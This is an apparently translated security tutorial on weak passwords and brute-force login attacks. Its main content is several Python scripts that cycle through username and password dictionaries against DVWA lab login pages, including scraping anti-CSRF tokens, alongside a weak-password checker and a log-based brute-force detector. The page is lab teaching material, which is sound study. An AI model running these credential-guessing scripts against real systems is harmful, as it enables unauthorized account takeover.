DAY17: weak password detection and test
2022-07-30 04:30:00 【EdmunDJK】
DAY17: Detection and testing of weak passwords
Brute-forcing directories with the brute-force module
Brute-forcing verification codes with the brute-force module
Using the brute-force module
FTP brute forcing
SSH password brute forcing
Remote Desktop brute forcing
Wi-Fi brute forcing (requires hardware)
SMS verification code brute forcing https://www.freebuf.com/articles/web/176701.html
https://www.freebuf.com/articles/web/228146.html
01. Definition of a weak password
There is no strict and precise definition of a weak password. Any password that is easy for other people (who may know you well) to guess, or for cracking tools to break, is generally considered a weak password.
A weak password is one that contains only simple digits and letters, such as "123" or "abc". Such passwords are easily cracked by others, which puts the user's computer at risk, so users are advised not to use them.
Sequential digits or letters, or letters in keyboard order
123456
abcdef
123abc
qwerty
Phrase passwords
5201314
iloveyou
woaini520
Birthday (name + birthday)
19951223
lisi1009
Common administrator password
admin
admin123
root
password
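An added example, not part of the original post: one way to check a candidate password against the four weak-password categories listed above, for instance when a user sets or changes a password. The word lists and the names `classify_weak`, `_is_run` and `_looks_like_date` are constructed for illustration, and the checks generalize slightly beyond the page's samples (any forward or reverse run of three or more characters, any plausible MMDD or YYYYMMDD suffix).

```python
import re

# Constructed sample lists; the categories mirror the ones listed above.
COMMON_ADMIN = {"admin", "admin123", "root", "password"}
PHRASES = {"5201314", "iloveyou", "woaini520"}
KEYBOARD_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]
ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def _is_run(chunk, sequences):
    """True if chunk (len >= 3) is a forward or reverse slice of any sequence."""
    return len(chunk) >= 3 and any(
        chunk in seq or chunk in seq[::-1] for seq in sequences)


def _looks_like_date(digits):
    """True for YYYYMMDD or MMDD digit strings with a plausible month and day."""
    if len(digits) == 8:
        year, digits = int(digits[:4]), digits[4:]
        if not 1900 <= year <= 2099:
            return False
    if len(digits) != 4:
        return False
    return 1 <= int(digits[:2]) <= 12 and 1 <= int(digits[2:]) <= 31


def classify_weak(password):
    """Return the list of weak-password categories that `password` falls into."""
    p = password.lower()
    reasons = []
    if p in COMMON_ADMIN:
        reasons.append("common administrator password")
    if p in PHRASES:
        reasons.append("phrase password")
    # Split into letter and digit chunks: "123abc" -> ["123", "abc"]
    chunks = re.findall(r"[a-z]+|[0-9]+", p)
    if chunks and "".join(chunks) == p and all(
            _is_run(c, KEYBOARD_ROWS + [ALPHABET]) for c in chunks):
        reasons.append("sequential or keyboard-order characters")
    m = re.fullmatch(r"([a-z]*)(\d{4}|\d{8})", p)
    if m and _looks_like_date(m.group(2)):
        reasons.append("birthday or name + birthday")
    return reasons
```

An empty list means none of these four patterns matched; it does not by itself mean the password is strong.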
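02. The dangers of weak passwords
Today, authentication in many places relies on a username (account) and password, so the importance of passwords is easy to see. A password is like the key to your house: when someone else holds a key that opens your home, think about your safety, your belongings, your privacy… frightening, isn't it? Because weak passwords are easily guessed or cracked by others, using one is like leaving your house key under the doormat by the front door, which is very dangerous.
03. Brute-force cracking
The principle of brute-force cracking is that the attacker takes their own username and password dictionaries and enumerates the entries one by one, testing whether each combination can log in. In theory, as long as the dictionary is large enough, the enumeration will always succeed.
04. Brute-force examples
4.1 Simple brute forcing
1. Use Burp to capture the login request and send it to Intruder

2. Set the payload, import the dictionary, and start the attack

4.2 seacms: brute forcing that ignores the verification code
1. The admin back end is at http://IP/admin, the user is admin and the password is unknown. Use Burp to capture the login request, send it to Intruder, and set the payload to brute-force it.

05. Using Python scripts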
```python
import requests

# Target URL
url = "http://5920517e-390c-4c21-8b65-010ecace4619.node4.buuoj.cn:81/vulnerabilities/brute/"
# Proxy setting, handy for inspecting the traffic in Burp
# proxies = {"http": "http://127.0.0.1:8080"}
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie': 'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'}

with open('result.txt', 'w') as f:
    for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):  # account dictionary, absolute path
        for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):  # password dictionary, absolute path
            username = admin.strip()
            password = line.strip()
            payload = {
                'username': username, 'password': password, "Login": 'Login'}
            Response = requests.get(url, params=payload, headers=header)
            # The success page contains this banner text
            if 'Welcome to the password protected area' in Response.text:
                result = username + ':' + password
                print(result)
                f.write(result + '\n')
print('\n完成')
```
```python
from bs4 import BeautifulSoup
import requests

url = "http://1647f7ed-06fe-49b5-936b-d052146a4e42.node4.buuoj.cn:81/vulnerabilities/brute/"
user_token = 'ab34360a044a8761ec431b16eb5223ce'
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    # Leading/trailing spaces removed: requests rejects header values that start with whitespace
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715; security=high'
}


def get_token(r):
    # Read the user_token hidden field out of the returned page
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="user_token"]')[0]['value']
    return user_token


if __name__ == "__main__":
    # Store the results in a file, CSV format here
    with open('result.csv', 'w') as f:
        f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')  # header row of the file
        # Walk the dictionary files
        for admin in open("The absolute path of the account"):
            for line in open("Password dictionary absolute path"):
                username = admin.strip()
                password = line.strip()
                payload = {
                    # Request parameters
                    'username': username,
                    'password': password,
                    'user_token': user_token,
                    'Login': 'Login'
                }
                # The DVWA brute form submits via GET. Send exactly one request per
                # attempt: every page load issues a new token, so the extra POST in the
                # original invalidated the token before the login request used it.
                Response = requests.get(url, params=payload, headers=header)
                # Content-Length is absent on chunked responses; fall back to the body size
                len1 = Response.headers.get('Content-Length', len(Response.content))
                result = username + ',' + password + ',' + str(len1)  # username, password, response length
                print(result)  # print to the terminal
                f.write(result + '\n')  # write to the file
                user_token = get_token(Response)  # token needed for the next iteration
    print('\n完成\n')
```
low:
```python
import requests


def read_txt():  # read a txt file into a list
    try:
        txtname = input(">>>输入txt文件名【例如name.txt】【It needs to be in the same folder as the script】\n: ")
        with open(txtname, "r") as f:
            lines = f.readlines()  # read the whole file, returned as a list
        return [x.strip() for x in lines]
    except OSError:
        print(">>>>>警告!不存在该txt文件<<<<<")
        return []  # the original returned an undefined variable here


url = "http://172.16.0.134/DVWA/vulnerabilities/brute/"
# url: the DVWA low level
header = {
    # Request headers
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Waterfox/56.6.2022.04',
    'Cookie': 'security=low; user=admin; PHPSESSID=7e0d1aac877440784a5f98bd9fcc62fd'
}

name_list = read_txt()
passwd_list = read_txt()  # read the dictionaries

# CSV table that stores one row per response
with open('返回包.csv', 'w') as f:
    f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + 'content_length' + '\n')
    for username in name_list:
        for password in passwd_list:
            payload = {
                'username': username, 'password': password, "Login": 'Login'}
            response = requests.get(url, params=payload, headers=header)
            # Content-Length is absent on chunked responses; fall back to the body size
            content_length = response.headers.get('content-length', len(response.content))
            # print(content_length)
            result = str(response.status_code) + ',' + username + ',' + password + ',' + str(content_length)
            f.write(result + '\n')
print('\n完成')
```
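From the defender's side, the one-by-one enumeration that the script above performs is visible in the web server's access log. The following is an added example, not part of the original post: it flags clients that try many different passwords against the login path within a short window. It assumes Apache-style access log lines; the log lines, IP addresses, thresholds and the names `parse_attempt` and `find_enumeration` are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<target>\S+) ')
LOGIN_PATH = "/vulnerabilities/brute/"  # assumption: the login endpoint to watch


def parse_attempt(line):
    """Return (ip, time, password) for a login request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query)
    if not parts.path.endswith(LOGIN_PATH) or "password" not in query:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, query["password"][0]


def find_enumeration(lines, max_distinct=5, window=timedelta(minutes=1)):
    """Map each client IP that tried more than `max_distinct` different
    passwords inside any `window`-long interval to its peak distinct count."""
    attempts = defaultdict(list)
    for ip, ts, password in filter(None, map(parse_attempt, lines)):
        attempts[ip].append((ts, password))
    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            distinct = {pw for _, pw in events[start:end + 1]}
            if len(distinct) > max_distinct:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged


# Constructed sample log: one client walking a dictionary, one ordinary login.
SAMPLE = [
    f'203.0.113.7 - - [30/Jul/2022:04:30:{s:02d} +0800] "GET /DVWA/vulnerabilities/brute/'
    f'?username=admin&password=guess{s}&Login=Login HTTP/1.1" 200 4237'
    for s in range(8)
] + ['198.51.100.4 - - [30/Jul/2022:04:31:10 +0800] "GET /DVWA/vulnerabilities/brute/'
     '?username=alice&password=x&Login=Login HTTP/1.1" 200 4290']
```

Because this login form uses GET, the attempted passwords themselves land in the access log, which is what lets the detector count distinct guesses. For a POST form, count failed-login events from the application log instead.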
high:
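In computer authentication, a token means a (temporary) credential; in lexical analysis it means a lexical unit. Tokens are generally used for invitations and for logging in to systems.
Token: an object that represents the right to perform certain operations
Access token: a system object that represents the subject of an access-control operation
Invitation code: used in invitation systems
Token: the token of Petri net theory
Security token, or hardware token (for example a U盾 USB key), also called an authentication token or cryptographic token: a physical device used to verify identity
Session token: the unique identifier of an interactive session
Tokenization: the process of replacing sensitive data items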
```python
# -*- coding: utf-8 -*-
# author = 'K0ctr'
import requests
import re
from bs4 import BeautifulSoup


def read_txt():  # read a txt file into a list
    try:
        txtname = input(">>>输入txt文件名【例如name.txt】【It needs to be in the same folder as the script】\n: ")
        with open(txtname, "r") as f:
            lines = f.readlines()  # read the whole file, returned as a list
        return [x.strip() for x in lines]
    except OSError:
        print(">>>>>警告!不存在该txt文件<<<<<")
        return []  # the original returned an undefined variable here


ip = "172.16.0.134"
url = "http://%s/dvwa/vulnerabilities/brute/" % ip
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Waterfox/56.6.2022.04',
    'Cookie': 'security=high; user=admin; PHPSESSID=7e0d1aac877440784a5f98bd9fcc62fd'
}  # request headers
name_list = read_txt()
passwd_list = read_txt()  # read the dictionaries
i = 0
for username in name_list:
    if (i == 1):  # exit flag
        break
    for password in passwd_list:
        # Visit the brute force page to get the token
        r = requests.get(url, headers=headers)
        soup = BeautifulSoup(r.text, "html.parser")
        token = soup.find_all("input")[3].get("value")  # read the token value
        # Build the parameters of the second request, using the token from the first response
        get_data = {
            "user_token": token,
            "username": username.strip(),
            "password": password.strip(),
            "Login": "Login"
        }
        print('用户名:', username.strip())
        print('密码:', password.strip())
        # Send the request and try to log in
        r = requests.get(url, params=get_data, headers=headers)
        # Match the response text to tell a failed attempt from a successful one
        if 'Username and/or password incorrect.' in r.text:
            print('>>>破解失败<<<')
        else:
            print('!!!!!!!!!!!!!!!!!!!!!!!!破解成功!!!!!!!!!!!!!!!!!!!!!!!!')
            print('-' * 20)
            i = 1
            break
        print('-' * 20)
```
```python
#-*- coding:utf-8 -*-
import requests
import time

dict_file = (r'D:\dir\PentesterSpecialDict-master\password-attacks\top10.txt')
u_name_list = ['admin']
headers = {
    'Cookie': 'security=high; PHPSESSID=cd2fhsr3h19lm0ipsqdgngj3fn', 'Referer': 'http://127.0.0.1/test/dvwa/vulnerabilities/brute/'}


# Request login.php to get the user_token from the returned page
def get_http(u_name, p_word):
    url = 'http://127.0.0.1/test/DVWA/login.php'
    req = requests.get(url, headers=headers)
    return (url, req.status_code, req.text)


# Log in with the user_token
def get_login(u_name, p_word, user_token):
    url = "http://127.0.0.1/test/DVWA/vulnerabilities/brute/?username=" + u_name + "&password=" + p_word + "&Login=Login" + "&user_token=" + user_token
    req = requests.post(url, headers=headers)
    return (url, req.status_code, req.text)


print('++++++++Start password brute force cracking++++++++')
for u_name in u_name_list:  # renamed from `list`, which shadowed the builtin
    print('------目前用户' + u_name)
    with open(dict_file, 'r') as f:
        for line in f:
            p_word = line.strip()
            # First request: login.php
            url, status_code, result = get_http(u_name, p_word)
            # Find the position of the user_token string
            start = result.find('user_token')
            # Slice out the 32-character user_token value
            user_token = result[start + 19:start + 51]
            # user_token = re.findall("<input.*?value=\'(.*?)' />", result)[0]
            # Log in with the user_token
            url, status_code, result = get_login(u_name, p_word, user_token)
            print(u_name + '|' + p_word + '|' + url + '|' + str(status_code) + '|' + str(len(result)))
            # print(result)
print('++++++++End password brute force cracking++++++++')
```